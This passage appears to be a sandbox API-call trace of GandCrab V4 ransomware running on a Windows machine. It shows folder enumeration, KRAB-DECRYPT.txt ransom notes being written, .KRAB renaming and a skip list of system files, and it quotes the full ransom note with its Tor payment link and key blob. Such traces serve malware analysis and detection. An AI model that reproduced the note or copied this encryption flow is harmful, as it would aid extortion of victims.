KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0072.463] WriteFile (in: hFile=0x468, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e0a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e0a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0072.466] CloseHandle (hObject=0x468) returned 1 [0072.467] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.467] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0072.467] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x13, wMilliseconds=0x2a2)) [0072.468] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0072.468] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0072.468] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0072.530] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\d2ca4a08d2ca4dee3d.lock") returned 122 [0072.530] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x468 [0072.540] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.540] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.541] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\") returned 99 [0072.541] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\*" [0072.541] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\*", lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 0x1023d38 [0072.541] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.541] FindNextFileW (in: hFindFile=0x1023d38, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0072.541] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.541] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.541] FindNextFileW (in: hFindFile=0x1023d38, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0072.541] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0072.541] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0072.541] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\", lpString2="1033" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033" [0072.541] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\" [0072.541] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0072.542] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0072.542] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0072.542] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0072.542] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0072.542] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.543] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0072.545] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\\\KRAB-DECRYPT.txt") returned 121 [0072.546] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0072.645] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0072.645] WriteFile (in: hFile=0x470, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338de20, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338de20*=0x1f6e, lpOverlapped=0x0) returned 1 [0072.645] CloseHandle (hObject=0x470) returned 1 [0072.646] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.646] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0072.646] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x13, wMilliseconds=0x34f)) [0072.646] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0072.647] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0072.647] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0072.647] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\d2ca4a08d2ca4dee3d.lock") returned 127 [0072.647] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x470 [0072.650] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.651] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.651] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\") returned 104 [0072.651] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\*" [0072.651] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\*", lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 0x1023bf8 [0072.651] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.651] FindNextFileW (in: hFindFile=0x1023bf8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0072.662] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.662] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.662] FindNextFileW (in: hFindFile=0x1023bf8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0072.662] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0072.662] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0072.662] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\d2ca4a08d2ca4dee3d.lock" [0072.662] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0072.662] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 132 [0072.662] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\d2ca4a08d2ca4dee3d.lock") returned 127 [0072.662] lstrlenW (lpString=".lock") returned 5 [0072.662] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0072.663] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0072.663] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.663] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.663] FindNextFileW (in: hFindFile=0x1023bf8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0072.663] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0072.663] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0072.663] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\KRAB-DECRYPT.txt" [0072.663] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0072.664] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\KRAB-DECRYPT.txt.KRAB") returned 125 [0072.664] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\KRAB-DECRYPT.txt") returned 120 [0072.664] lstrlenW (lpString=".txt") returned 4 [0072.664] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0072.664] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0072.664] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.664] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\KRAB-DECRYPT.txt") returned 120 [0072.664] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\KRAB-DECRYPT.txt") returned 120 [0072.664] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.664] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.664] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0072.665] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.665] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.665] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.665] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0072.665] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0072.665] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0072.665] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0072.665] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.665] FindNextFileW (in: hFindFile=0x1023bf8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0072.665] lstrcmpW (lpString1="TM03328884[[fn=architecture]].glox", lpString2=".") returned 1 [0072.665] lstrcmpW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="..") returned 1 [0072.665] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", 